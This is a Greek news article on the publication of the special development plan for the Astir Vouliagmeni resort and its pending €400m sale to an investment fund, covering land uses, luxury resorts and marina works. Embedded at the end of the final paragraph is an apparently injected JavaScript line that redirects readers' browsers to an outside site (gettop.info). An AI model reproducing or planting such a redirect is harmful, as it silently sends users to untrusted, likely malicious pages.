Κοντά στην ολοκλήρωση της πώλησης του Αστέρα Βουλιαγμένης

0
10

 

Στην Εφημερίδα της Κυβέρνησης δημοσιεύτηκε το Ειδικό Σχέδιο Ανάπτυξης (ΕΣΧΑΔΑ) για την παραχώρηση του Αστέρα Βουλιαγμένης.

Η δημοσίευση του διατάγματος («Έγκριση Ειδικού Σχεδίου Χωρικής Ανάπτυξης Δημοσίου Ακινήτου και τροποποίηση του εγκεκριμένου σχεδίου πόλεως Βουλιαγμένης Αττικής στην έκταση του «Αστέρα Βουλιαγμένης» και καθορισμός χρήσεων γης και όρων δόμησης») αποτελεί ουσιαστική εξέλιξη που φέρνει ακόμη πιο κοντά την ολοκλήρωση του deal για την πώληση του Αστέρα Βουλιαγμένης, έναντι 400 εκατ.ευρώ, στο αραβο-τουρκικών συμφερόντων επενδυτικό σχήμα Jermyn Street Real Estate Fund IV, όπως δημοσιεύει το capital.gr.

Η έκταση των 301 στρεμμάτων, σύμφωνα με το ΕΣΧΑΔΑ, χωρίζεται σε διαφορετικές περιοχές, εκ των οποίων στην κάθε μια από αυτές καθορίζονται διαφορετικές χρήσεις. Ο επενδυτής θα προχωρήσει σε ουσιαστικές παρεμβάσεις σε αυτή που χαρακτηρίζεται ως «Περιοχή Τουρισμού – Αναψυχής – Παραθε-ριστικής Κατοικίας».

fek-asteras

Εκεί, ως γνωστόν, οι μονάδες «Αρίων» και «Ναυσικά» θα μετατραπούν σε υπερπολυτελή τουριστικά θέρετρα 7 αστέρων, ενώ θα κατασκευαστούν έως 15 πολυτελείς κατοικίες στο νότιο-δυτικό κομμάτι της χερσονήσου, στη θέση που βρίσκεται σήμερα το εγκαταλελειμμένα ξενοδοχείο «Αφροδίτη». Στις εγκαταστάσεις θα περιλαμβάνεται ελικοδρόμιο ενώ υπάρχει πρόβλεψη για επέκταση και βελτίωση των εγκαταστάσεων της μαρίνας ώστε να φιλοξενεί mega yachts.

Συνολικά, στην έκταση η μέγιστη επιτρεπόμενη δόμηση ανέρχεται σε 56.500 τ.μ., ενώ, μετά την αποπεράτωση της ανακατασκευής, οι δομημένοι χώροι θα μειωθούν κατά 20.655 τ.μ. Ταυτόχρονα, η χρήση κατοικίας θα διαμορφωθεί σε 39.000 τ.μ., ενώ προβλέπεται ότι στο 74% της έκτασης θα αναπτυχθούν χρήσεις τουρισμού και αναψυχής. Ακόμη, προβλέπεται η διαμόρφωση ειδικής εισόδου για το κοινό προς τον ναό του Απόλλωνα Ζωστήρα. Υπολογίζεται ότι θα επενδυθούν περίπου 700 εκατ. ευρώ (συμπεριλαμβανομένου του τιμήματος) για την αναμόρφωση της έκτασης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here